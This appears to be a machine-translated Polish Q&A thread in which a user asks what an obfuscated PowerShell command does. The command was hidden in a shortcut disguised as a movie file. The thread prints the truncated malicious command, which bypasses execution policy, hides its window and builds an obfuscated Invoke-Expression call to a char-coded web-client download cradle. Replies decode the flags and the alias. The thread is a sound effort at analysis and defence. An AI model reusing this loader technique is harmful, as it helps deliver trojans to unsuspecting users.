Jak zdekodować możliwe polecenie PowerShell złośliwego oprogramowania

0

Mam plik, który powinien być filmem, ale okazał się skrótem do wykonania polecenia PowerShell. Szczegóły są następujące:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.

Czy ktoś może doradzić, co zrobiłaby ta komenda PowerShell lub gdzie mogę znaleźć szczegółowe informacje na temat jej dekodowania

Dzięki

powershell malware kfbnlet
źródło
[1] biegnij, powershell.exe /?aby zobaczyć, jakie są pierwsze trzy -somethingpozycje. [2] biegnij, ( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')aby zobaczyć, co to jest. jeśli nie znasz aliasów, uruchom Get-Aliasz tego wyjście. [3] reszta to prawdopodobnie początek polecenia zakodowanego w standardzie base64. to nie wszystko, więc nie ma sposobu, aby się tego upewnić.
Lee_Dailey
Nie uruchamiaj żadnej części polecenia, jeśli nie jesteś pewien, co robisz i uważasz, że polecenie jest złośliwe.
root
Plik (o wielkości 750 MB i wyglądający jak plik filmowy) jest w rzeczywistości skrótem, a linia poleceń powyżej jest celem skrótu. Sprawdziłem i nie ma tam nic więcej, więc jeśli czegoś brakuje, musi to być jakaś zawartość.
kfbnlet,
Przedwcześnie opublikował poprzedni komentarz. Ran Malwarebytes, który zidentyfikował instalację instalacji trojana, kiedy uruchomiłem skrót, więc było to złośliwe oprogramowanie.
kfbnlet,

Odpowiedzi:

2

powershell.exe -NoPr -WINd 1 -eXEc ByP jest powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy bypass

Polecenie, które próbuje wykonać, $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN''jest w rzeczywistości iexaliasemInvoke-Expression

Uważam, że przegapiłeś część wiersza poleceń, więc trudno jest powiedzieć, co oznacza reszta.

montonero
źródło